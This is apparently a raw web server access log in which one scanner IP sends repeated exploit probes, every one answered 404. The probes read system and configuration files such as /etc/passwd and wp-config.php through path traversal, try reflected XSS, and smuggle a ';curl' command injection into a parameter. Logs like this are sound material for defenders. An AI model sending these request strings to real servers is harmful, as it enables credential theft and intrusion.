137.220.197.141 - - [21/Jan/2024:07:59:12 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:17 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:19 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:26 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:33 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:35 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:45 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:47 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:00:58 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:01:12 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:02:58 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:03:00 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:03:12 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:03:27 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:03:28 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:03:43 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:03:54 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:19 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:28 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:29 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:35 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:37 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:40 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:04:53 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:05:54 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:06:04 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:06:16 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:07:24 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:07:26 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:07:45 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:07:47 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:08:03 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:08:09 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:08:11 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:08:43 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:08:54 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:09:14 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:09:18 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:10:03 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:10:14 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:10:25 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:11:00 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:11:15 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:11:38 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:11:48 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:12:01 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:13:18 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:14:03 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:14:04 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:14:07 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:14:09 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:14:56 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:23 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:36 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:36 +0100] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:38 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:42 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:45 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:15:57 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:16:04 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:16:08 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:16:10 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:16:19 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:16:21 +0100] "GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:16:21 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:17:45 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:17:47 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:19:47 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:19:47 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:20:42 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:20:45 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:20:47 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:06 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:06 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:08 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:32 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:34 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:36 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:38 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:21:47 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:22:00 +0100] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:22:51 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:22:53 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:23:43 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:23:45 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:31 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:33 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:33 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:44 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:46 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:57 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:25:59 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:26:05 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:26:07 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:26:28 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:26:30 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:26:30 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:26:32 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:27:02 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:27:42 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:27:44 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:27:46 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:27:48 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:27:48 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:28:02 +0100] "POST /XMLCHART HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:28:07 +0100] "POST /php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:28:09 +0100] "GET /Uploads/2bECyr9OevB8Mt7EtKCeHndEVjS.php7 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:28:40 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:28:52 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:29:06 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:29:22 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:29:24 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:30:08 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:30:10 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
96.127.160.234 - - [21/Jan/2024:08:30:21 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:32:29 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:32:31 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:32:44 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:33:36 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:02 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:04 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:05 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:45 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:45 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:46 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:34:47 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:35:29 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:36:12 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:36:51 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:36:53 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:03 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:15 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:28 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:36 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:39 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:41 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:46 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:48 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:51 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:53 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:37:58 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:38:17 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:39:10 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:39:21 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:39:25 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:39:33 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:40:33 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:40:47 +0100] "GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:40:49 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:40:56 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:09 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:22 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:37 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:37 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:51 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:51 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:53 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:41:59 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:13 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:14 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:14 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:17 +0100] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:19 +0100] "GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:27 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:27 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:42:29 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:43:15 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:43:38 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:45:14 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:45:43 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:45:48 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:45:50 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:11 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:12 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:14 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:17 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:19 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:35 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:38 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:38 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:40 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:43 +0100] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:46:45 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:47:22 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:47:43 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:47:56 +0100] "GET /include/downmix.inc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:48:09 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:48:11 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:48:47 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:49:00 +0100] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:49:20 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:49:33 +0100] "GET /anchor/errors.log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:51:17 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:52:56 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:53:29 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:53:31 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
